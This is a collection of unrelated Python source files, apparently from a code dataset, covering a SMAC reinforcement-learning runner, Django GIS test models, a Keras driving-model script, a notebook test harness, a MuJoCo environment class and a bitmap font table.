cls._queues[name] = {"name": name, "routing_key": routing_key or name, "queue_arguments": queue_arguments}
@classmethod
def has_queue(cls, queue):
return queue in cls._queues
@classmethod
def routing_key_for(cls, queue):
return cls._queues[queue]["routing_key"]
|
py
|
1a5ef20fa32f1b6eb64d5257c3feb98252f5bc82
|
import os
from abc import ABC, abstractmethod
from datetime import datetime
from os import path
import torch as th
from tqdm import tqdm
import wandb
from ..controllers import BaseController, DQNController, DRLController, RandomController
from ..encoding import LabelEncoder
from ..envs import SMACEnv
from ..rl.replay import EpisodeReplayBuffer, PrioritizedEpisodeReplayBuffer, Transition
from ..training import TrainingConfig
# th.autograd.set_detect_anomaly(True)
class Runner(ABC):
def __init__(self, trainer: TrainingConfig):
self.training_config = trainer
self.controller: BaseController
@abstractmethod
def make_agent(
self,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
encoding_output_size,
graph_module_sizes,
action_hidden_size,
):
raise NotImplementedError
@abstractmethod
def run(self):
raise NotImplementedError
class SMACRunner(Runner, ABC):
def __init__(self, trainer: TrainingConfig):
super().__init__(trainer)
self.checkpoint_file = path.join(trainer.log_dir, "checkpoint.pth")
resume_run = path.isfile(self.checkpoint_file)
self.step_num = 0
self.episode_num = 0
previous_step_num = 0
if resume_run:
print("Checkpoint file found, loading initial data...")
checkpoint = th.load(self.checkpoint_file)
previous_step_num = checkpoint["total_steps"]
self.episode_num = checkpoint["n_episodes"]
self.step_num += previous_step_num
if not trainer.resume_run:
trainer.max_num_steps += previous_step_num
if self.step_num >= trainer.max_num_steps:
print("Number of training steps achieved or surpassed. EXITING.")
exit(0)
if not trainer.dry_run:
if not path.exists(trainer.log_dir):
os.makedirs(trainer.log_dir)
args_to_log = trainer.get_loggable_args()
wandb_config = {}
for key in args_to_log:
for subkey in args_to_log[key]:
wandb_config[subkey[0]] = subkey[1]
wandb.init(
project="hcanet",
name=trainer.run_name,
id=trainer.run_name,
dir="/tmp/wandb",
resume=resume_run,
config=wandb_config,
group=trainer.run_prefix,
)
if trainer.episode_priority is None:
self.memory = EpisodeReplayBuffer(trainer.replay_buffer_size)
else:
self.memory = PrioritizedEpisodeReplayBuffer(
trainer.replay_buffer_size,
trainer.replay_buffer_alpha,
)
self.pbar = tqdm(
initial=self.step_num - previous_step_num,
total=trainer.max_num_steps - previous_step_num,
smoothing=0,
)
replay_dir = path.join(trainer.log_dir, "game_replays", trainer.game_name)
self.env = SMACEnv(
map_name=trainer.game_name,
replay_dir=replay_dir,
reward_sparse=trainer.sparse_rewards,
)
env_info = self.env.get_env_info()
self.env.reset()
# this information can only be acquired after the environment is initialized
unit_types = self.env.get_unit_types()
n_agents = env_info["n_agents"]
n_actions = env_info["n_actions"]
# n_agent_features = len(env_info["agent_features"])
# n_enemy_features = len(env_info["enemy_features"])
v2_obs_shape = env_info["obs_shape"]
# get unit types from the environment
# normalize using label encoder
# ignore non-agent unit types
self.node_types = list(LabelEncoder(unit_types).transform(unit_types))
self.node_types = th.tensor(self.node_types[:n_agents], device=trainer.device).int()
agent_types = self.node_types.unique().tolist()
features_by_node_type = [v2_obs_shape] * len(agent_types)
actions_by_node_type = [n_actions] * len(agent_types)
self.controller = self.make_agent(
self.node_types.tolist(),
agent_types,
features_by_node_type,
actions_by_node_type,
trainer.encoding_hidden_size,
trainer.comms_sizes,
trainer.action_hidden_size,
)
if trainer.dry_run:
exit(0)
def sample_from_memory(self):
return (self.memory.sample(self.batch_size) if not self.memory.is_prioritized else
self.memory.sample(self.batch_size, self.replay_buffer_beta))
def maybe_backup_buffer(self):
if (self.step_num % self.replay_buffer_save_interval == 0 and
len(self.memory) >= self.replay_buffer_save_interval):
print("Saving a sample of the replay buffer to file...")
th.save(
self.memory.copy(self.replay_buffer_save_interval),
self.replay_buffer_file,
)
def log_episode(self, things_to_log, prefix="episode"):
# add the prefix to arg names
loggers_poggers = {}
for key in things_to_log:
loggers_poggers[prefix + "/" + key] = things_to_log[key]
wandb.log(loggers_poggers, step=self.step_num)
class OffPolicySMACRunner(SMACRunner):
def make_agent(
self,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
encoding_output_size,
graph_module_sizes,
action_hidden_size,
):
return DQNController(
self.checkpoint_file,
self.training_config.action_module,
self.training_config.policy,
self.training_config.max_num_steps,
self.training_config.batch_size,
self.training_config.optimizer,
self.training_config.lr,
self.training_config.weight_decay,
self.training_config.rmsprop_alpha,
self.training_config.rmsprop_eps,
self.training_config.trr_coef,
self.training_config.checkpoint_save_secs,
self.training_config.graph_layer_type,
self.training_config.share_encoding,
self.training_config.share_comms,
self.training_config.share_action,
self.training_config.full_agent_communication,
self.training_config.full_receptive_field,
self.training_config.gat_n_heads,
self.training_config.gat_average_last,
self.training_config.rgcn_n2_relations,
self.training_config.rgcn_num_bases,
self.training_config.rgcn_fast,
self.training_config.device,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
self.training_config.training_mode,
self.training_config.data_parallel,
self.training_config.act_encoding,
self.training_config.act_comms,
self.training_config.act_action,
self.training_config.use_rnn_encoding,
self.training_config.use_rnn_action,
self.training_config.gamma,
self.training_config.eps_start,
self.training_config.eps_end,
self.training_config.eps_anneal_time,
self.training_config.target_update,
self.training_config.double_dqn,
self.training_config.mixer,
encoding_output_size=encoding_output_size,
graph_module_sizes=graph_module_sizes,
action_hidden_size=action_hidden_size,
)
def run(self):
last_eval = 0
training_start = datetime.now()
while self.step_num < self.training_config.max_num_steps:
step_start = self.step_num
time_start = datetime.now()
episode, episode_reward, info = self.play_episode()
# training_mode is true when not in eval mode
# TODO this variable seems useless
if self.training_config.training_mode:
# Store the transition in memory
self.memory.add(episode)
# self.trainer.maybe_backup_buffer()
# Perform one step of the optimization (on the target network)
if self.memory.can_sample(self.training_config.batch_size):
self.controller.policy_net.train()
self.controller.optimize(self.step_num, self.training_config, self.memory)
self.controller.maybe_save_checkpoint(self.step_num)
# Update the target network, copying all
# weights and biases from the policy network
if self.episode_num % self.training_config.target_update == 0:
self.controller.update_target_net()
things_to_log = {
"episode_reward": episode_reward,
"battles_won": self.env.get_stats()["battles_won"],
"time_secs": (datetime.now() - time_start).total_seconds(),
"num_steps": self.step_num - step_start, }
if "dead_allies" in info:
things_to_log["dead_allies"] = info["dead_allies"]
things_to_log["dead_enemies"] = info["dead_enemies"]
self.log_episode(things_to_log)
# evaluation
# only evaluate if has already been trained
if (self.memory.can_sample(self.training_config.batch_size) and
self.step_num - last_eval >= self.training_config.eval_interval):
last_eval = self.step_num - (self.step_num % self.training_config.eval_interval)
self.evaluate(n_episodes=self.training_config.eval_episodes)
# release GPU cache alongside evaluation
th.cuda.empty_cache()
with open(path.join(self.training_config.log_dir, "run_time.txt"), "a") as f:
f.write(str(datetime.now() - training_start))
self.env.close()
def play_episode(self):
self.env.reset()
current_state = self.env.get_graph_state(
self.node_types,
self.controller.agent_types if self.controller.full_agent_communication else None,
v2=self.training_config.v2_state,
)
self.episode_num += 1
episode_reward = 0
episode_steps = 0
episode = []
done = False
with th.no_grad():
self.controller.policy_net.eval()
self.controller.policy_net.action_layer.init_hidden(1)
while not done:
episode_steps += 1
self.step_num += 1
# I did this and the network learned something
# batch = [t.state.to(self.controller.device) for t in episode] + [current_state]
# batch = Batch.from_data_list(batch)
# q_vals = self.controller.policy_net(batch)
q_vals = self.controller.policy_net(current_state.to(self.training_config.device))
# Select and perform an action
av_actions = self.env.get_avail_actions()
actions = (self.controller.act(q_vals[0], av_actions, self.step_num).detach().cpu())
# if isinstance(self.controller, MultiAgentActorCritic):
# actions = actions[0]
reward, done, info = self.env.step(actions)
if self.training_config.render_eval:
self.env.render()
self.pbar.update()
# observe new state
next_state = (None if done else self.env.get_graph_state(
self.node_types,
self.controller.agent_types if self.controller.full_agent_communication else None,
v2=self.training_config.v2_state,
))
# detach graph tensors in place before the state is stored in the episode buffer
for key, item in current_state:
current_state[key] = item.detach()
# pass everything to CPU for storage
# NOTE I don't know if this actually saves GPU memory
for i, _ in enumerate(av_actions):
av_actions[i] = av_actions[i].cpu()
episode.append(Transition(current_state.cpu(), actions, reward, float(done),
av_actions))
# Move to the next state
current_state = next_state
episode_reward += reward
return episode, episode_reward, info
def evaluate(self, n_episodes=32, close_env=False):
time_start = datetime.now()
battles_won = dead_allies = dead_enemies = eval_reward = 0
for _ in tqdm(range(n_episodes), desc="Ep."):
episode, episode_reward, info = self.play_episode()
eval_reward += episode_reward
if "dead_allies" in info:
dead_allies += info["dead_allies"]
dead_enemies += info["dead_enemies"]
if "battle_won" in info:
battles_won += info["battle_won"]
if self.training_config.save_replays:
self.env.save_replay()
things_to_log = {
"episode_reward": (eval_reward / n_episodes),
"battles_won": battles_won / n_episodes,
"time_secs": (datetime.now() - time_start).total_seconds() / n_episodes, }
if "dead_allies" in info:
things_to_log["dead_allies"] = dead_allies / n_episodes
things_to_log["dead_enemies"] = dead_enemies / n_episodes
self.log_episode(things_to_log, prefix="eval")
if close_env:
self.env.close()
class RandomSMACRunner(SMACRunner):
def make_agent(
self,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
encoding_hidden_sizes=None,
encoding_output_size=None,
graph_hidden_sizes=None,
graph_output_size=None,
action_hidden_size=None,
):
return RandomController(
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
self.training_config.device,
)
def run(self):
self.controller.initialize()
while self.step_num < self.training_config.max_num_steps:
step_start = self.step_num
time_start = datetime.now()
self.episode_num += 1
episode_reward = th.zeros(self.controller.n_agents, requires_grad=False)
episode_steps = 0
done = False
while not done:
if (self.training_config.max_steps_episode is not None and
episode_steps >= self.training_config.max_steps_episode):
break
episode_steps += 1
self.step_num += 1
# Select and perform an action
actions = self.controller.act(self.env.get_avail_actions())
reward, done, info = self.env.step(actions)
reward = th.tensor([reward] * self.controller.n_agents, dtype=th.float)
if self.training_config.render_train:
self.env.render()
self.pbar.update()
episode_reward += reward
self.log_episode(step_start, time_start, episode_reward.mean(), info)
if self.step_num < self.training_config.max_num_steps:
self.env.reset()
self.env.close()
if __name__ == "__main__":
trainer = TrainingConfig()
trainer.initialize()
runner: Runner
if trainer.game == TrainingConfig.GameType.SMAC:
# if trainer.action_module in TrainingConfig.OFF_POLICY_METHODS:
runner = OffPolicySMACRunner(trainer)
# elif trainer.action_module == TrainingConfig.ActionModuleType.RANDOM:
# runner = RandomSMACRunner(trainer)
else:
raise ValueError("Game or action module type does not exist")
try:
runner.run()
except (Exception, KeyboardInterrupt) as e:
if isinstance(runner.controller, DRLController):
print("Something happened, saving checkpoint...")
runner.controller.save_checkpoint(runner.step_num)
if not isinstance(e, KeyboardInterrupt):
with open(path.join(trainer.log_dir, "log.txt"), "a") as f:
import traceback
f.write(str(e))
f.write(traceback.format_exc())
raise e
|
py
|
1a5ef2cf9043d961485d9e41f8d7960f4c978496
|
from django.contrib.gis.db import models
from ..utils import gisfield_may_be_null
class NamedModel(models.Model):
name = models.CharField(max_length=30)
class Meta:
abstract = True
required_db_features = ['gis_enabled']
def __str__(self):
return self.name
class SouthTexasCity(NamedModel):
"City model on projected coordinate system for South Texas."
point = models.PointField(srid=32140)
radius = models.IntegerField(default=10000)
class SouthTexasCityFt(NamedModel):
"Same City model as above, but U.S. survey feet are the units."
point = models.PointField(srid=2278)
class AustraliaCity(NamedModel):
"City model for Australia, using WGS84."
point = models.PointField()
radius = models.IntegerField(default=10000)
class CensusZipcode(NamedModel):
"Model for a few South Texas ZIP codes (in original Census NAD83)."
poly = models.PolygonField(srid=4269)
class SouthTexasZipcode(NamedModel):
"Model for a few South Texas ZIP codes."
poly = models.PolygonField(srid=32140, null=gisfield_may_be_null)
class Interstate(NamedModel):
"Geodetic model for U.S. Interstates."
path = models.LineStringField()
class SouthTexasInterstate(NamedModel):
"Projected model for South Texas Interstates."
path = models.LineStringField(srid=32140)
|
py
|
1a5ef6ee5992827a4a5db875568c700470137a7a
|
import csv
import cv2
import numpy as np
path1='/home/workspace/CarND-Behavioral-Cloning-P3/data/'
path2='/opt/training/'
images = []
measurements = []
def flip(image,measurment):
image_flipped = np.fliplr(image)
measurement_flipped = -measurment
images.append(image_flipped)
measurements.append(measurement_flipped)
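# Flipping mirrors the frame left-right and negates the steering angle
# (e.g. 0.25 becomes -0.25), effectively doubling the training data.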
def load(path):
lines=[]
with open(path+'driving_log.csv') as csvfile:
reader=csv.reader(csvfile)
for line in reader:
lines.append(line)
i=0
for line in lines:
if i==0:
i+=1
continue
center_path = line[0]
left_path = line[1]
right_path = line[2]
filename_center=center_path.split('/')[-1]
filename_left=left_path.split('/')[-1]
filename_right=right_path.split('/')[-1]
path_center = path + 'IMG/' + filename_center
path_left = path + 'IMG/' + filename_left
path_right = path + 'IMG/' + filename_right
image_center = cv2.imread(path_center)
image_left = cv2.imread(path_left)
image_right = cv2.imread(path_right)
measurment_center = float(line[3])
measurment_left = float(line[3]) + 0.25
measurment_right = float(line[3]) - 0.25
images.append(image_center)
images.append(image_left)
images.append(image_right)
measurements.append(measurment_center)
measurements.append(measurment_left)
measurements.append(measurment_right)
# Flip the image to gain more training data
flip(image_center,measurment_center)
flip(image_left,measurment_left)
flip(image_right,measurment_right)
load(path1)
load(path2)
X_train = np.array(images)
y_train = np.array(measurements)
from keras.models import Sequential
from keras.layers import Lambda, Cropping2D, ELU
from keras.layers.core import Dense, Activation, Flatten, Dropout
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
model = Sequential()
model.add(Lambda(lambda x: x / 255.0 - 0.5,input_shape=(160,320,3)))
model.add(Cropping2D(cropping=((70,25),(0,0))))
model.add(Conv2D(filters=24, kernel_size=(5, 5), activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(filters=36, kernel_size=(5, 5), activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(units=120, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(units=84, activation='relu'))
model.add(Dense(units=10, activation='relu'))
model.add(Dense(units=1))
model.compile(loss='mse', optimizer='adam')
model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=3)
model.save('model.h5')
|
py
|
1a5ef6f93f1c8476939aaadd24da2ab4eed2da8e
|
import os
import re
import sys
from py._io.terminalwriter import get_terminal_width
from . import __version__ as testmynb__version__
from ._ansi import green, red, orange, strip_ansi
class TestHandler:
def __init__(self, *notebooks):
self.notebooks = notebooks
@property
def _summary(self):
notebook_count = len(self.notebooks)
test_count = sum([len(nb.extract_codes()) for nb in self.notebooks])
py_ver = re.sub(r"\s.*", "", sys.version)
header = self._h1_message("Test My Notebook ({})".format(testmynb__version__))
return "{}".format(header) + "\n".join(
[
"Platform {}".format(sys.platform),
"Python {}".format(py_ver),
"Working Directory: {}".format(os.getcwd()),
"",
"{0} test cells across {1} notebook(s) detected.".format(
test_count, notebook_count
),
"",
]
)
@staticmethod
def _h1_message(message):
col = get_terminal_width()
no_formats = strip_ansi(message)
# Remove the ANSI escape codes to check the message length
num_equals = (col - len(no_formats) - 3) // 2
equals_sign = num_equals * "="
return "{1} {0} {1}\n".format(message, equals_sign)
@property
def _notebook_summary_section(self):
section = ["Notebooks:\n"]
for nb in self.notebooks:
trust = green("Trusted") if nb.trusted else red("Untrusted")
string = "{} {}: {}\n".format(trust, nb.name, nb.result)
section.append(string)
section.append("\n")
return "".join(section)
def __call__(self):
failed_or_error = False
output_message = list()
for nb in self.notebooks:
nb()
output_message.append(self._summary)
output_message.append(self._notebook_summary_section)
errors = self.collect_errors()
fails = self.collect_fails()
if fails:
failed_or_error = True
head_message = red(self._h1_message("Failed Test(s)"))
output_message.append(head_message)
for cell, err in fails.items():
string = "---- {}: {} ----\n".format(cell.notebook, cell.name)
output_message.append(string)
output_message.append(str(cell))
output_message.append(
red("\n-----------------------------------------\n")
)
output_message.append(err)
output_message.append("\n\n")
if errors:
failed_or_error = True
head_message = orange(self._h1_message("Errored Test(s)"))
output_message.append(head_message)
for cell, err in errors.items():
string = "---- {}: {} ----\n".format(cell.notebook, cell.name)
output_message.append(string)
output_message.append(str(cell))
output_message.append(
red("\n-----------------------------------------\n")
)
output_message.append(err)
output_message.append("\n\n")
output_message.append(self._final_remarks)
output_message = "".join(output_message)
print(output_message)
if failed_or_error:
sys.exit(1)
@property
def _final_remarks(self):
all_tests = "".join([nb.result for nb in self.notebooks])
passed_test_count = all_tests.count(".")
failed_test_count = all_tests.count("F")
errored_test_count = all_tests.count("E")
passed_text = green("{} test(s) passed".format(passed_test_count))
failed_text = red("{} failed".format(failed_test_count))
error_text = orange(" and {} raised an error".format(errored_test_count))
return self._h1_message(
"{}, {},{}".format(passed_text, failed_text, error_text)
)
def collect_errors(self):
errors = dict()
for nb in self.notebooks:
errors.update(nb.get_error_stack())
return errors
def collect_fails(self):
fails = dict()
for nb in self.notebooks:
fails.update(nb.get_fail_stack())
return fails
def find_notebooks(*args):
notebooks = list()
if len(args):
for path in args:
if os.path.isfile(path):
notebooks.append(path)
elif os.path.isdir(path):
notebooks.extend(_recursive_find_notebooks(path))
else:
notebooks = _recursive_find_notebooks(os.getcwd())
return notebooks
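# Usage sketch (paths are hypothetical): find_notebooks("nb/", "test_io.ipynb")
# returns the explicit file plus every test_*.ipynb found under nb/, while
# find_notebooks() with no arguments walks the current working directory.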
def _recursive_find_notebooks(path):
notebooks = list()
for root, dirs, files in os.walk(path):
for file in files:
if ".ipynb_checkpoints" in root:
continue
if re.match(r"^test_.+\.ipynb", file):
notebooks.append(os.path.join(root, file))
return notebooks
|
py
|
1a5ef74fe95e0a7e1934539ea46803001ebe441c
|
n = int(input())
i = n // 5
while i >= 0:
q, r = divmod(n - 5 * i, 3)
if r == 0:
print(i + q)
break
i -= 1
if i < 0:
print(-1)
|
py
|
1a5ef7f6617a47e4f075b37c588af796c37f2adf
|
import numpy as np
import os.path as osp
from rllab import spaces
from rllab.envs.base import Env
from rllab.misc.overrides import overrides
from rllab.mujoco_py import MjModel, MjViewer
from rllab.misc import autoargs
from rllab.misc import logger
import theano
import tempfile
import os
import mako.template
import mako.lookup
MODEL_DIR = osp.abspath(
osp.join(
osp.dirname(__file__),
'../../../vendor/mujoco_models'
)
)
BIG = 1e6
class MujocoEnv(Env):
FILE = None
@autoargs.arg('action_noise', type=float,
help='Noise added to the controls, which will be '
'proportional to the action bounds')
def __init__(self, action_noise=0.0, file_path=None, template_args=None):
# compile template
if file_path is None:
if self.__class__.FILE is None:
raise "Mujoco file not specified"
file_path = osp.join(MODEL_DIR, self.__class__.FILE)
if file_path.endswith(".mako"):
lookup = mako.lookup.TemplateLookup(directories=[MODEL_DIR])
with open(file_path) as template_file:
template = mako.template.Template(
template_file.read(), lookup=lookup)
content = template.render(
opts=template_args if template_args is not None else {},
)
tmp_f, file_path = tempfile.mkstemp(text=True)
with open(file_path, 'w') as f:
f.write(content)
self.model = MjModel(file_path)
os.close(tmp_f)
else:
self.model = MjModel(file_path)
self.data = self.model.data
self.viewer = None
self.init_qpos = self.model.data.qpos
self.init_qvel = self.model.data.qvel
self.init_qacc = self.model.data.qacc
self.init_ctrl = self.model.data.ctrl
self.qpos_dim = self.init_qpos.size
self.qvel_dim = self.init_qvel.size
self.ctrl_dim = self.init_ctrl.size
self.action_noise = action_noise
if "frame_skip" in self.model.numeric_names:
frame_skip_id = self.model.numeric_names.index("frame_skip")
addr = self.model.numeric_adr.flat[frame_skip_id]
self.frame_skip = int(self.model.numeric_data.flat[addr])
else:
self.frame_skip = 1
if "init_qpos" in self.model.numeric_names:
init_qpos_id = self.model.numeric_names.index("init_qpos")
addr = self.model.numeric_adr.flat[init_qpos_id]
size = self.model.numeric_size.flat[init_qpos_id]
init_qpos = self.model.numeric_data.flat[addr:addr + size]
self.init_qpos = init_qpos
self.dcom = None
self.current_com = None
self.reset()
super(MujocoEnv, self).__init__()
@property
@overrides
def action_space(self):
bounds = self.model.actuator_ctrlrange
lb = bounds[:, 0]
ub = bounds[:, 1]
return spaces.Box(lb, ub)
@property
@overrides
def observation_space(self):
shp = self.get_current_obs().shape
ub = BIG * np.ones(shp)
return spaces.Box(ub * -1, ub)
@property
def action_bounds(self):
return self.action_space.bounds
def reset_mujoco(self, init_state=None):
if init_state is None:
self.model.data.qpos = self.init_qpos + \
np.random.normal(size=self.init_qpos.shape) * 0.01
self.model.data.qvel = self.init_qvel + \
np.random.normal(size=self.init_qvel.shape) * 0.1
self.model.data.qacc = self.init_qacc
self.model.data.ctrl = self.init_ctrl
else:
start = 0
for datum_name in ["qpos", "qvel", "qacc", "ctrl"]:
datum = getattr(self.model.data, datum_name)
datum_dim = datum.shape[0]
datum = init_state[start: start + datum_dim]
setattr(self.model.data, datum_name, datum)
start += datum_dim
@overrides
def reset(self, init_state=None):
self.reset_mujoco(init_state)
self.model.forward()
self.current_com = self.model.data.com_subtree[0]
self.dcom = np.zeros_like(self.current_com)
return self.get_current_obs()
def get_current_obs(self):
return self._get_full_obs()
def _get_full_obs(self):
data = self.model.data
cdists = np.copy(self.model.geom_margin).flat
for c in self.model.data.contact:
cdists[c.geom2] = min(cdists[c.geom2], c.dist)
obs = np.concatenate([
data.qpos.flat,
data.qvel.flat,
# data.cdof.flat,
data.cinert.flat,
data.cvel.flat,
# data.cacc.flat,
data.qfrc_actuator.flat,
data.cfrc_ext.flat,
data.qfrc_constraint.flat,
cdists,
# data.qfrc_bias.flat,
# data.qfrc_passive.flat,
self.dcom.flat,
])
return obs
@property
def _state(self):
return np.concatenate([
self.model.data.qpos.flat,
self.model.data.qvel.flat
])
@property
def _full_state(self):
return np.concatenate([
self.model.data.qpos,
self.model.data.qvel,
self.model.data.qacc,
self.model.data.ctrl,
]).ravel()
def inject_action_noise(self, action):
# generate action noise
noise = self.action_noise * \
np.random.normal(size=action.shape)
# rescale the noise to make it proportional to the action bounds
lb, ub = self.action_bounds
noise = 0.5 * (ub - lb) * noise
return action + noise
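# Illustrative effect (numbers are examples only): with control bounds [-1, 1]
# and action_noise = 0.1, the rescaling factor 0.5 * (ub - lb) equals 1, so the
# injected Gaussian noise has standard deviation 0.1, i.e. proportional to the
# width of the action range.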
def forward_dynamics(self, action):
self.model.data.ctrl = self.inject_action_noise(action)
for _ in range(self.frame_skip):
self.model.step()
self.model.forward()
new_com = self.model.data.com_subtree[0]
self.dcom = new_com - self.current_com
self.current_com = new_com
def get_viewer(self):
if self.viewer is None:
self.viewer = MjViewer()
self.viewer.start()
self.viewer.set_model(self.model)
return self.viewer
def render(self, close=False):
if close:
self.stop_viewer()
else:
#self.get_viewer().render()
self.get_viewer().loop_once()
data, width, height = self.get_viewer().get_image()
return np.frombuffer(data, dtype='uint8').reshape(height, width, 3)[::-1, :, :]
return None
def start_viewer(self):
viewer = self.get_viewer()
if not viewer.running:
viewer.start()
def stop_viewer(self):
if self.viewer:
self.viewer.finish()
self.viewer = None
def release(self):
# temporarily alleviate the issue (but still some leak)
from rllab.mujoco_py.mjlib import mjlib
mjlib.mj_deleteModel(self.model._wrapped)
mjlib.mj_deleteData(self.data._wrapped)
def get_body_xmat(self, body_name):
idx = self.model.body_names.index(body_name)
return self.model.data.xmat[idx].reshape((3, 3))
def get_body_com(self, body_name):
idx = self.model.body_names.index(body_name)
return self.model.data.com_subtree[idx]
def get_body_comvel(self, body_name):
idx = self.model.body_names.index(body_name)
return self.model.body_comvels[idx]
def print_stats(self):
super(MujocoEnv, self).print_stats()
print("qpos dim:\t%d" % len(self.model.data.qpos))
def action_from_key(self, key):
raise NotImplementedError
|
py
|
1a5ef949b8ae69a219ea60fda0c9cd33c8814d80
|
"""converted from ..\fonts\vga_8x8.bin """
WIDTH = 8
HEIGHT = 8
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x18\x3c\x3c\x18\x18\x00\x18\x00'\
b'\x66\x66\x24\x00\x00\x00\x00\x00'\
b'\x6c\x6c\xfe\x6c\xfe\x6c\x6c\x00'\
b'\x18\x3e\x60\x3c\x06\x7c\x18\x00'\
b'\x00\xc6\xcc\x18\x30\x66\xc6\x00'\
b'\x38\x6c\x38\x76\xdc\xcc\x76\x00'\
b'\x18\x18\x30\x00\x00\x00\x00\x00'\
b'\x0c\x18\x30\x30\x30\x18\x0c\x00'\
b'\x30\x18\x0c\x0c\x0c\x18\x30\x00'\
b'\x00\x66\x3c\xff\x3c\x66\x00\x00'\
b'\x00\x18\x18\x7e\x18\x18\x00\x00'\
b'\x00\x00\x00\x00\x00\x18\x18\x30'\
b'\x00\x00\x00\x7e\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x18\x18\x00'\
b'\x06\x0c\x18\x30\x60\xc0\x80\x00'\
b'\x38\x6c\xc6\xd6\xc6\x6c\x38\x00'\
b'\x18\x38\x18\x18\x18\x18\x7e\x00'\
b'\x7c\xc6\x06\x1c\x30\x66\xfe\x00'\
b'\x7c\xc6\x06\x3c\x06\xc6\x7c\x00'\
b'\x1c\x3c\x6c\xcc\xfe\x0c\x1e\x00'\
b'\xfe\xc0\xc0\xfc\x06\xc6\x7c\x00'\
b'\x38\x60\xc0\xfc\xc6\xc6\x7c\x00'\
b'\xfe\xc6\x0c\x18\x30\x30\x30\x00'\
b'\x7c\xc6\xc6\x7c\xc6\xc6\x7c\x00'\
b'\x7c\xc6\xc6\x7e\x06\x0c\x78\x00'\
b'\x00\x18\x18\x00\x00\x18\x18\x00'\
b'\x00\x18\x18\x00\x00\x18\x18\x30'\
b'\x06\x0c\x18\x30\x18\x0c\x06\x00'\
b'\x00\x00\x7e\x00\x00\x7e\x00\x00'\
b'\x60\x30\x18\x0c\x18\x30\x60\x00'\
b'\x7c\xc6\x0c\x18\x18\x00\x18\x00'\
b'\x7c\xc6\xde\xde\xde\xc0\x78\x00'\
b'\x38\x6c\xc6\xfe\xc6\xc6\xc6\x00'\
b'\xfc\x66\x66\x7c\x66\x66\xfc\x00'\
b'\x3c\x66\xc0\xc0\xc0\x66\x3c\x00'\
b'\xf8\x6c\x66\x66\x66\x6c\xf8\x00'\
b'\xfe\x62\x68\x78\x68\x62\xfe\x00'\
b'\xfe\x62\x68\x78\x68\x60\xf0\x00'\
b'\x3c\x66\xc0\xc0\xce\x66\x3a\x00'\
b'\xc6\xc6\xc6\xfe\xc6\xc6\xc6\x00'\
b'\x3c\x18\x18\x18\x18\x18\x3c\x00'\
b'\x1e\x0c\x0c\x0c\xcc\xcc\x78\x00'\
b'\xe6\x66\x6c\x78\x6c\x66\xe6\x00'\
b'\xf0\x60\x60\x60\x62\x66\xfe\x00'\
b'\xc6\xee\xfe\xfe\xd6\xc6\xc6\x00'\
b'\xc6\xe6\xf6\xde\xce\xc6\xc6\x00'\
b'\x7c\xc6\xc6\xc6\xc6\xc6\x7c\x00'\
b'\xfc\x66\x66\x7c\x60\x60\xf0\x00'\
b'\x7c\xc6\xc6\xc6\xc6\xce\x7c\x0e'\
b'\xfc\x66\x66\x7c\x6c\x66\xe6\x00'\
b'\x3c\x66\x30\x18\x0c\x66\x3c\x00'\
b'\x7e\x7e\x5a\x18\x18\x18\x3c\x00'\
b'\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00'\
b'\xc6\xc6\xc6\xc6\xc6\x6c\x38\x00'\
b'\xc6\xc6\xc6\xd6\xd6\xfe\x6c\x00'\
b'\xc6\xc6\x6c\x38\x6c\xc6\xc6\x00'\
b'\x66\x66\x66\x3c\x18\x18\x3c\x00'\
b'\xfe\xc6\x8c\x18\x32\x66\xfe\x00'\
b'\x3c\x30\x30\x30\x30\x30\x3c\x00'\
b'\xc0\x60\x30\x18\x0c\x06\x02\x00'\
b'\x3c\x0c\x0c\x0c\x0c\x0c\x3c\x00'\
b'\x10\x38\x6c\xc6\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xff'\
b'\x30\x18\x0c\x00\x00\x00\x00\x00'\
b'\x00\x00\x78\x0c\x7c\xcc\x76\x00'\
b'\xe0\x60\x7c\x66\x66\x66\xdc\x00'\
b'\x00\x00\x7c\xc6\xc0\xc6\x7c\x00'\
b'\x1c\x0c\x7c\xcc\xcc\xcc\x76\x00'\
b'\x00\x00\x7c\xc6\xfe\xc0\x7c\x00'\
b'\x3c\x66\x60\xf8\x60\x60\xf0\x00'\
b'\x00\x00\x76\xcc\xcc\x7c\x0c\xf8'\
b'\xe0\x60\x6c\x76\x66\x66\xe6\x00'\
b'\x18\x00\x38\x18\x18\x18\x3c\x00'\
b'\x06\x00\x06\x06\x06\x66\x66\x3c'\
b'\xe0\x60\x66\x6c\x78\x6c\xe6\x00'\
b'\x38\x18\x18\x18\x18\x18\x3c\x00'\
b'\x00\x00\xec\xfe\xd6\xd6\xd6\x00'\
b'\x00\x00\xdc\x66\x66\x66\x66\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\x00'\
b'\x00\x00\xdc\x66\x66\x7c\x60\xf0'\
b'\x00\x00\x76\xcc\xcc\x7c\x0c\x1e'\
b'\x00\x00\xdc\x76\x60\x60\xf0\x00'\
b'\x00\x00\x7e\xc0\x7c\x06\xfc\x00'\
b'\x30\x30\xfc\x30\x30\x36\x1c\x00'\
b'\x00\x00\xcc\xcc\xcc\xcc\x76\x00'\
b'\x00\x00\xc6\xc6\xc6\x6c\x38\x00'\
b'\x00\x00\xc6\xd6\xd6\xfe\x6c\x00'\
b'\x00\x00\xc6\x6c\x38\x6c\xc6\x00'\
b'\x00\x00\xc6\xc6\xc6\x7e\x06\xfc'\
b'\x00\x00\x7e\x4c\x18\x32\x7e\x00'\
b'\x0e\x18\x18\x70\x18\x18\x0e\x00'\
